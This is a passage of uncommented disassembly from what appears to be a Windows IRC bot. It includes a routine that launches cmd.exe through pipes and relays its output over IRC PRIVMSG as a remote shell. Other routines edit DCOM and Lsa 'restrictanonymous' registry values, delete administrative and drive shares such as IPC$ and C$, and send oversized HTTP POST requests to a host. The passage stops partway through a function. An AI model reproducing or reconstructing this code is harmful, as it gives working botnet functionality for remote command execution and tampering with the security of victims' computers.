leave
retn
sub_41A969 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A9A1(int,char *Str1,int)
sub_41A9A1 proc near ; CODE XREF: sub_41AA28+D3�p
; sub_41AA28+F2�p ...
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str1 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push offset byte_4F45D4 ; Str2
push [ebp+Str1] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_41A9E4
push 7D0h
call ds:dword_4F6380 ; Sleep
push [ebp+arg_8]
lea eax, [ebp+Dest]
push [ebp+Str1]
push offset aPrivmsgSS_4 ; "PRIVMSG %s :%s\r"
push eax ; Dest
call _sprintf
add esp, 10h
jmp short loc_41A9FB
; ---------------------------------------------------------------------------
loc_41A9E4: ; CODE XREF: sub_41A9A1+1A�j
push [ebp+arg_8]
lea eax, [ebp+Dest]
push offset aS_31 ; "%s"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_41A9FB: ; CODE XREF: sub_41A9A1+41�j
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push [ebp+arg_0]
call dword_4E4270 ; send
test eax, eax
jg short loc_41AA24
call sub_41A939
loc_41AA24: ; CODE XREF: sub_41A9A1+7C�j
xor eax, eax
leave
retn
sub_41A9A1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AA28 proc near ; DATA XREF: sub_41AB7D+174�o
Dst = byte ptr -20Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
mov esi, 200h
xor edi, edi
mov ebx, offset byte_4F4598
loc_41AA40: ; CODE XREF: sub_41AA28+79�j
; sub_41AA28+DB�j
push esi ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_4]
push edi
push edi
push eax
lea eax, [ebp+Dst]
push esi
push eax
push dword_4F458C
call ds:dword_4F6494 ; PeekNamedPipe
test eax, eax
jz loc_41AB0E
cmp [ebp+var_4], edi
jnz short loc_41AAA3
lea eax, [ebp+var_8]
push eax
push dword_4F4588
call ds:dword_4F6490 ; GetExitCodeProcess
test eax, eax
jz short loc_41AA99
cmp [ebp+var_8], 103h
jnz loc_41AB32
loc_41AA99: ; CODE XREF: sub_41AA28+62�j
push 0Ah
call ds:dword_4F6380 ; Sleep
jmp short loc_41AA40
; ---------------------------------------------------------------------------
loc_41AAA3: ; CODE XREF: sub_41AA28+4E�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_41AABA
loc_41AAAA: ; CODE XREF: sub_41AA28+90�j
cmp [ebp+eax+Dst], 0Ah
jz short loc_41AB08
inc eax
cmp eax, [ebp+var_4]
jb short loc_41AAAA
loc_41AABA: ; CODE XREF: sub_41AA28+80�j
mov [ebp+var_4], esi
loc_41AABD: ; CODE XREF: sub_41AA28+E4�j
push esi ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_C]
push edi
push eax
push [ebp+var_4]
lea eax, [ebp+Dst]
push eax
push dword_4F458C
call ds:dword_4F63F0 ; ReadFile
test eax, eax
jz short loc_41AB5A
lea eax, [ebp+Dst]
push eax ; int
push ebx ; Str1
push dword_4F45CC ; int
call sub_41A9A1
add esp, 0Ch
jmp loc_41AA40
; ---------------------------------------------------------------------------
loc_41AB08: ; CODE XREF: sub_41AA28+8A�j
inc eax
mov [ebp+var_4], eax
jmp short loc_41AABD
; ---------------------------------------------------------------------------
loc_41AB0E: ; CODE XREF: sub_41AA28+45�j
push offset unk_451E3C ; int
push ebx ; Str1
push dword_4F45CC ; int
call sub_41A9A1
push [ebp+arg_0]
call sub_40BAAA
add esp, 10h
push 1
call ds:dword_4F63D4 ; ExitThread
loc_41AB32: ; CODE XREF: sub_41AA28+6B�j
call sub_41A939
push offset unk_451E6C ; int
push ebx ; Str1
push dword_4F45CC ; int
call sub_41A9A1
push [ebp+arg_0]
call sub_40BAAA
add esp, 10h
push edi
call ds:dword_4F63D4 ; ExitThread
loc_41AB5A: ; CODE XREF: sub_41AA28+C3�j
push offset unk_451E94 ; int
push ebx ; Str1
push dword_4F45CC ; int
call sub_41A9A1
push [ebp+arg_0]
call sub_40BAAA
add esp, 10h
push edi
call ds:dword_4F63D4 ; ExitThread
sub_41AA28 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AB7D proc near ; CODE XREF: sub_401CC7+24C4�p
; sub_4167F7+99�p
Dest = byte ptr -378h
var_178 = byte ptr -178h
var_74 = dword ptr -74h
var_48 = dword ptr -48h
var_44 = word ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
Dst = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 378h
push esi
push edi
call sub_41A939
xor esi, esi
lea eax, [ebp+var_178]
push esi
push eax
push 104h
push esi
push offset aCmd_exe_0 ; "cmd.exe"
push esi
call dword_4E42DC ; SearchPathA
test eax, eax
jz loc_41AC77
lea eax, [ebp+var_1C]
mov edi, ds:dword_4F6404
push esi
push eax
lea eax, [ebp+var_C]
mov [ebp+var_1C], 0Ch
push eax
lea eax, [ebp+var_10]
push eax
mov [ebp+var_14], 1
mov [ebp+var_18], esi
call edi ; CreatePipe
test eax, eax
jz loc_41AC77
lea eax, [ebp+var_1C]
push esi
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
call edi ; CreatePipe
test eax, eax
jz loc_41AC77
mov edi, ds:dword_4F6400
push 3
push esi
push esi
push offset dword_4F4590
call edi ; GetCurrentProcess
push eax
push [ebp+var_8]
call edi ; GetCurrentProcess
push eax
call ds:dword_4F63FC ; DuplicateHandle
test eax, eax
jz short loc_41AC77
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
push 44h
lea eax, [ebp+var_74]
pop edi
push edi ; Size
push esi ; Val
push eax ; Dst
call _memset
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+var_3C], eax
mov eax, [ebp+var_C]
mov [ebp+var_38], eax
mov [ebp+var_34], eax
lea eax, [ebp+Dst]
mov [ebp+var_74], edi
push eax
lea eax, [ebp+var_74]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
lea eax, [ebp+var_178]
push offset dword_4F45D8
push eax
mov [ebp+var_48], 101h
mov [ebp+var_44], si
call ds:dword_4F6374 ; CreateProcessA
test eax, eax
jnz short loc_41AC7F
loc_41AC77: ; CODE XREF: sub_41AB7D+2E�j
; sub_41AB7D+5C�j ...
or eax, 0FFFFFFFFh
jmp loc_41AD31
; ---------------------------------------------------------------------------
loc_41AC7F: ; CODE XREF: sub_41AB7D+F8�j
push [ebp+var_4]
mov edi, ds:dword_4F6370
call edi ; CloseHandle
mov eax, [ebp+var_10]
push [ebp+var_28]
mov dword_4F458C, eax
mov eax, [ebp+var_8]
mov dword_4F4594, eax
mov eax, [ebp+Dst]
mov dword_4F4588, eax
call edi ; CloseHandle
mov eax, [ebp+arg_0]
cmp [ebp+arg_4], esi
mov dword_4F45CC, eax
jz short loc_41ACB9
push [ebp+arg_4]
jmp short loc_41ACBE
; ---------------------------------------------------------------------------
loc_41ACB9: ; CODE XREF: sub_41AB7D+135�j
push offset byte_4F45DC ; Format
loc_41ACBE: ; CODE XREF: sub_41AB7D+13A�j
push offset byte_4F4598 ; Dest
call _sprintf
pop ecx
pop ecx
push esi ; int
push 0Ah ; int
push offset asc_451ECC ; "-"
call sub_40B78E
mov edi, eax
mov ecx, [ebp+var_24]
imul edi, 234h
add esp, 0Ch
mov dword_457130[edi], ecx
lea ecx, [ebp+var_30]
push ecx
push esi
push eax
push offset sub_41AA28
push esi
push esi
call ds:dword_4F6384 ; CreateThread
cmp eax, esi
mov dword_45713C[edi], eax
jnz short loc_41AD2F
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Dest]
push offset asc_451EF0 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push eax
call sub_415C77
add esp, 10h
loc_41AD2F: ; CODE XREF: sub_41AB7D+189�j
xor eax, eax
loc_41AD31: ; CODE XREF: sub_41AB7D+FD�j
pop edi
pop esi
leave
retn
sub_41AB7D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AD35 proc near ; DATA XREF: sub_401CC7+2E14�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
pop edi
pop esi
push [ebp+var_8]
cmp [ebp+var_10], 0
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_94]
push [ebp+var_C]
push eax
push [ebp+var_98]
jz short loc_41AD7C
call sub_41AD95
jmp short loc_41AD81
; ---------------------------------------------------------------------------
loc_41AD7C: ; CODE XREF: sub_41AD35+3E�j
call sub_41B0B9
loc_41AD81: ; CODE XREF: sub_41AD35+45�j
add esp, 10h
push [ebp+var_14]
call sub_40BAAA
pop ecx
push 0
call ds:dword_4F63D4 ; ExitThread
sub_41AD35 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AD95 proc near ; CODE XREF: sub_41AD35+40�p
Dest = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
Str = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp dword_4E42F0, edi
jnz loc_41AEC7
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call dword_4E4290 ; RegOpenKeyExA
test eax, eax
jnz short loc_41AE20
mov ax, word_451F68
mov word ptr [ebp+Str+2], ax
lea eax, [ebp+Str+2]
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str+2]
push eax
push 1
push edi
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_4E4244 ; RegSetValueExA
test eax, eax
jz short loc_41AE02
push offset dword_451F78
jmp short loc_41AE07
; ---------------------------------------------------------------------------
loc_41AE02: ; CODE XREF: sub_41AD95+64�j
push offset asc_451F9C ; "-"
loc_41AE07: ; CODE XREF: sub_41AD95+6B�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push [ebp+var_4]
call dword_4E41FC ; RegCloseKey
jmp short loc_41AE33
; ---------------------------------------------------------------------------
loc_41AE20: ; CODE XREF: sub_41AD95+36�j
lea eax, [ebp+Dest]
push offset asc_451FBC ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41AE33: ; CODE XREF: sub_41AD95+89�j
cmp [ebp+arg_C], edi
jnz short loc_41AE52
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 14h
loc_41AE52: ; CODE XREF: sub_41AD95+A1�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_4E4290 ; RegOpenKeyExA
test eax, eax
jnz short loc_41AEC0
lea eax, [ebp+Str]
push 4
push eax
push 4
push edi
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov dword ptr [ebp+Str], 1
call dword_4E4244 ; RegSetValueExA
test eax, eax
jz short loc_41AEA2
push offset dword_452000
jmp short loc_41AEA7
; ---------------------------------------------------------------------------
loc_41AEA2: ; CODE XREF: sub_41AD95+104�j
push offset asc_45203C ; "-"
loc_41AEA7: ; CODE XREF: sub_41AD95+10B�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push [ebp+var_4]
call dword_4E41FC ; RegCloseKey
jmp short loc_41AEDA
; ---------------------------------------------------------------------------
loc_41AEC0: ; CODE XREF: sub_41AD95+E2�j
push offset dword_452070
jmp short loc_41AECC
; ---------------------------------------------------------------------------
loc_41AEC7: ; CODE XREF: sub_41AD95+13�j
push offset asc_4520AC ; "-"
loc_41AECC: ; CODE XREF: sub_41AD95+130�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41AEDA: ; CODE XREF: sub_41AD95+129�j
cmp [ebp+arg_C], edi
jnz short loc_41AEF9
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 14h
loc_41AEF9: ; CODE XREF: sub_41AD95+148�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
cmp dword_4E4318, edi
pop ecx
jnz loc_41B074
push ebx
mov [ebp+var_4], edi
mov [ebp+var_14], edi
mov [ebp+var_C], edi
loc_41AF1C: ; CODE XREF: sub_41AD95+2C3�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+Str]
push 0FFFFFFFFh
push eax
push 1F6h
push edi
call dword_4E4164
cmp eax, edi
mov [ebp+var_10], eax
jz short loc_41AFB9
cmp eax, 0EAh
jz short loc_41AFB9
mov esi, offset off_451F28
loc_41AF4D: ; CODE XREF: sub_41AD95+21D�j
push dword ptr [esi]
push edi
call sub_419B70
pop ecx
pop ecx
push dword ptr [esi]
test eax, eax
jnz short loc_41AF64
push offset dword_45212C
jmp short loc_41AF69
; ---------------------------------------------------------------------------
loc_41AF64: ; CODE XREF: sub_41AD95+1C6�j
push offset asc_452150 ; "-"
loc_41AF69: ; CODE XREF: sub_41AD95+1CD�j
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_41AF9C
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 14h
loc_41AF9C: ; CODE XREF: sub_41AD95+1EB�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
add esi, 8
pop ecx
cmp esi, offset aIpc ; "IPC$"
jb short loc_41AF4D
jmp loc_41B051
; ---------------------------------------------------------------------------
loc_41AFB9: ; CODE XREF: sub_41AD95+1AA�j
; sub_41AD95+1B1�j
mov esi, dword ptr [ebp+Str]
push 1
pop ebx
cmp [ebp+var_4], ebx
jb loc_41B048
loc_41AFC8: ; CODE XREF: sub_41AD95+2AF�j
mov edi, [esi]
push edi ; Str
call _wcslen
cmp word ptr [edi+eax*2-2], 24h
pop ecx
jnz short loc_41B03D
push edi
call sub_419A5D
push eax
push 0
call sub_419B70
add esp, 0Ch
push dword ptr [esi]
test eax, eax
jnz short loc_41AFF7
push offset dword_4520DC
jmp short loc_41AFFC
; ---------------------------------------------------------------------------
loc_41AFF7: ; CODE XREF: sub_41AD95+259�j
push offset asc_452100 ; "-"
loc_41AFFC: ; CODE XREF: sub_41AD95+260�j
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_41B030
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 14h
loc_41B030: ; CODE XREF: sub_41AD95+27F�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
pop ecx
loc_41B03D: ; CODE XREF: sub_41AD95+242�j
add esi, 28h
inc ebx
cmp ebx, [ebp+var_4]
jbe short loc_41AFC8
xor edi, edi
loc_41B048: ; CODE XREF: sub_41AD95+22D�j
push dword ptr [ebp+Str]
call dword_4E42B0
loc_41B051: ; CODE XREF: sub_41AD95+21F�j
cmp [ebp+var_10], 0EAh
jz loc_41AF1C
lea eax, [ebp+Dest]
push offset asc_45217C ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
pop ebx
jmp short loc_41B087
; ---------------------------------------------------------------------------
loc_41B074: ; CODE XREF: sub_41AD95+177�j
lea eax, [ebp+Dest]
push offset asc_4521A4 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41B087: ; CODE XREF: sub_41AD95+2DD�j
cmp [ebp+arg_C], edi
jnz short loc_41B0A5
push edi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 14h
loc_41B0A5: ; CODE XREF: sub_41AD95+2F5�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
pop ecx
push 1
pop eax
pop edi
pop esi
leave
retn
sub_41AD95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B0B9 proc near ; CODE XREF: sub_41AD35:loc_41AD7C�p
Dest = byte ptr -220h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
Str = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 220h
push esi
push edi
xor edi, edi
cmp dword_4E42F0, edi
jnz loc_41B1E7
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call dword_4E4290 ; RegOpenKeyExA
test eax, eax
jnz short loc_41B144
mov ax, word_4521D4
mov word ptr [ebp+Str+2], ax
lea eax, [ebp+Str+2]
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str+2]
push eax
push 1
push edi
push offset aEnabledcom_0 ; "EnableDCOM"
push [ebp+var_4]
call dword_4E4244 ; RegSetValueExA
test eax, eax
jz short loc_41B126
push offset dword_4521E4
jmp short loc_41B12B
; ---------------------------------------------------------------------------
loc_41B126: ; CODE XREF: sub_41B0B9+64�j
push offset asc_452208 ; "-"
loc_41B12B: ; CODE XREF: sub_41B0B9+6B�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push [ebp+var_4]
call dword_4E41FC ; RegCloseKey
jmp short loc_41B157
; ---------------------------------------------------------------------------
loc_41B144: ; CODE XREF: sub_41B0B9+36�j
lea eax, [ebp+Dest]
push offset asc_452224 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41B157: ; CODE XREF: sub_41B0B9+89�j
cmp [ebp+arg_C], edi
jnz short loc_41B176
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 14h
loc_41B176: ; CODE XREF: sub_41B0B9+A1�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_4E4290 ; RegOpenKeyExA
test eax, eax
jnz short loc_41B1E0
lea eax, [ebp+Str]
push 4
push eax
push 4
push edi
push offset aRestrictanon_0 ; "restrictanonymous"
push [ebp+var_4]
mov dword ptr [ebp+Str], edi
call dword_4E4244 ; RegSetValueExA
test eax, eax
jz short loc_41B1C2
push offset dword_452268
jmp short loc_41B1C7
; ---------------------------------------------------------------------------
loc_41B1C2: ; CODE XREF: sub_41B0B9+100�j
push offset asc_4522A8 ; "-"
loc_41B1C7: ; CODE XREF: sub_41B0B9+107�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push [ebp+var_4]
call dword_4E41FC ; RegCloseKey
jmp short loc_41B1FA
; ---------------------------------------------------------------------------
loc_41B1E0: ; CODE XREF: sub_41B0B9+E2�j
push offset dword_4522E0
jmp short loc_41B1EC
; ---------------------------------------------------------------------------
loc_41B1E7: ; CODE XREF: sub_41B0B9+13�j
push offset asc_45231C ; "-"
loc_41B1EC: ; CODE XREF: sub_41B0B9+12C�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41B1FA: ; CODE XREF: sub_41B0B9+125�j
cmp [ebp+arg_C], edi
jnz short loc_41B219
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 14h
loc_41B219: ; CODE XREF: sub_41B0B9+144�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
cmp dword_4E4318, edi
pop ecx
jnz loc_41B38E
mov esi, offset off_451F28
loc_41B237: ; CODE XREF: sub_41B0B9+1E7�j
push dword ptr [esi+4] ; int
push dword ptr [esi] ; Str
push edi ; int
call sub_419AC4
add esp, 0Ch
push dword ptr [esi]
test eax, eax
jnz short loc_41B252
push offset dword_45234C
jmp short loc_41B257
; ---------------------------------------------------------------------------
loc_41B252: ; CODE XREF: sub_41B0B9+190�j
push offset asc_45236C ; "-"
loc_41B257: ; CODE XREF: sub_41B0B9+197�j
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_41B28A
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 14h
loc_41B28A: ; CODE XREF: sub_41B0B9+1B5�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
add esi, 8
pop ecx
cmp esi, offset off_451F38
jb short loc_41B237
push ebx
call ds:dword_4F6498 ; GetLogicalDrives
mov edi, eax
mov bl, 41h
test edi, edi
jz loc_41B376
loc_41B2B5: ; CODE XREF: sub_41B0B9+2B7�j
mov eax, edi
and eax, 1
cmp al, 1
jnz loc_41B36C
cmp bl, 41h
jz loc_41B36C
movsx esi, bl
push esi
push offset aC_1 ; "%c$"
lea eax, [ebp+var_14]
push 0Ah ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_20]
push esi
push offset aC_0 ; "%c:\\"
push 0Ah ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_20]
push eax
call dword_4E4280 ; GetDriveTypeA
cmp eax, 3
jnz short loc_41B36C
lea eax, [ebp+var_20]
push eax ; int
lea eax, [ebp+var_14]
push eax ; Str
push 0 ; int
call sub_419AC4
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_14]
push eax
jnz short loc_41B326
push offset dword_4523A0
jmp short loc_41B32B
; ---------------------------------------------------------------------------
loc_41B326: ; CODE XREF: sub_41B0B9+264�j
push offset asc_4523C0 ; "-"
loc_41B32B: ; CODE XREF: sub_41B0B9+26B�j
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_41B35F
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 14h
loc_41B35F: ; CODE XREF: sub_41B0B9+28A�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
pop ecx
loc_41B36C: ; CODE XREF: sub_41B0B9+203�j
; sub_41B0B9+20C�j ...
inc bl
shr edi, 1
jnz loc_41B2B5
loc_41B376: ; CODE XREF: sub_41B0B9+1F6�j
lea eax, [ebp+Dest]
push offset asc_4523E8 ; "-"
push eax ; Dest
call _sprintf
pop ecx
xor edi, edi
pop ecx
pop ebx
jmp short loc_41B3A1
; ---------------------------------------------------------------------------
loc_41B38E: ; CODE XREF: sub_41B0B9+173�j
lea eax, [ebp+Dest]
push offset asc_45240C ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41B3A1: ; CODE XREF: sub_41B0B9+2D3�j
cmp [ebp+arg_C], edi
jnz short loc_41B3BF
push edi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 14h
loc_41B3BF: ; CODE XREF: sub_41B0B9+2EB�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
pop ecx
push 1
pop eax
pop edi
pop esi
leave
retn
sub_41B0B9 endp
; =============== S U B R O U T I N E =======================================
sub_41B3D3 proc near ; CODE XREF: sub_41B5CA+CB�p
; sub_41B5CA+DD�p ...
arg_0 = dword ptr 4
call ds:dword_4F63B0 ; GetTickCount
push eax ; Seed
call _srand
pop ecx
call _rand
cdq
idiv [esp+arg_0]
mov eax, edx
retn
sub_41B3D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41B3ED(char *Str)
sub_41B3ED proc near ; CODE XREF: sub_41B5CA+D4�p
; sub_41B5CA+E6�p ...
var_38 = dword ptr -38h
Dst = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
Memory = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
push [ebp+Str] ; Str
call _strlen
mov esi, 0FFh
pop ecx
cmp eax, esi
ja loc_41B5C6
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
push [ebp+Str]
mov [ebp+Dst], 2
call sub_40AE8D
add esp, 10h
mov [ebp+var_24], eax
test eax, eax
jz loc_41B5C6
push 50h
call dword_4E4220 ; htons
push 6
push 1
push 2
mov [ebp+var_26], ax
call dword_4E42A0 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_41B5C6
lea ecx, [ebp+Dst]
push 10h
push ecx
push eax
call dword_4E41C8 ; connect
cmp eax, 0FFFFFFFFh
jz loc_41B5C6
push 32003h ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
mov edi, ds:dword_4F63B0
mov ebx, eax
pop ecx
mov [ebp+Memory], ebx
call edi ; GetTickCount
push eax ; Seed
call _srand
call _rand
cdq
idiv esi
mov [esp+38h+var_38], 32001h
push 0 ; Val
push ebx ; Dst
movsx esi, dl
call _memset
push 32000h ; Size
push esi ; Val
push ebx ; Dst
call _memset
push ebx ; Str
call _strlen
push 323EAh ; unsigned int
mov ebx, eax
call ??2@YAPAXI@Z ; operator new(uint)
add esp, 20h
mov esi, eax
push ebx
push [ebp+Str]
push offset aPostHttp1_0Hos ; "POST / HTTP/1.0\r\nHost: %s\r\nContent-Leng"...
push esi ; Dest
call _sprintf
push [ebp+Memory] ; Source
push esi ; Dest
call _strcat
push offset asc_452470 ; "\r\n"
push esi ; Dest
call _strcat
push esi ; Str
call _strlen
mov ebx, eax
add esp, 24h
mov [ebp+var_10], ebx
call edi ; GetTickCount
mov dword ptr [ebp+var_18+4], eax
xor eax, eax
test ebx, ebx
mov [ebp+Str], eax
jbe short loc_41B546
mov [ebp+var_C], ebx
mov ebx, 400h
jmp short loc_41B516
; ---------------------------------------------------------------------------
loc_41B513: ; CODE XREF: sub_41B3ED+157�j
mov eax, [ebp+Str]
loc_41B516: ; CODE XREF: sub_41B3ED+124�j
mov ecx, [ebp+var_10]
push 0
sub ecx, eax
cmp ecx, ebx
jnb short loc_41B526
push [ebp+var_C]
jmp short loc_41B527
; ---------------------------------------------------------------------------
loc_41B526: ; CODE XREF: sub_41B3ED+132�j
push ebx
loc_41B527: ; CODE XREF: sub_41B3ED+137�j
add eax, esi
push eax
push [ebp+var_4]
call dword_4E4270 ; send
cmp eax, 0FFFFFFFFh
jz short loc_41B5AD
add [ebp+Str], ebx
sub [ebp+var_C], ebx
mov eax, [ebp+Str]
cmp eax, [ebp+var_10]
jb short loc_41B513
loc_41B546: ; CODE XREF: sub_41B3ED+11A�j
call edi ; GetTickCount
sub eax, dword ptr [ebp+var_18+4]
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
fmul ds:flt_43D4EC
fst [ebp+Str]
fcomp ds:flt_43D4E8
fnstsw ax
sahf
jnz short loc_41B56E
fld1
fstp [ebp+Str]
loc_41B56E: ; CODE XREF: sub_41B3ED+17A�j
push [ebp+var_4]
call dword_4E42B8 ; closesocket
push [ebp+Memory] ; Memory
call _free
push esi ; Memory
call _free
mov eax, [ebp+var_10]
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
pop ecx
fild [ebp+var_18]
pop ecx
fdiv [ebp+Str]
fmul ds:flt_43D4E4
fmul ds:flt_43D4E0
call __ftol
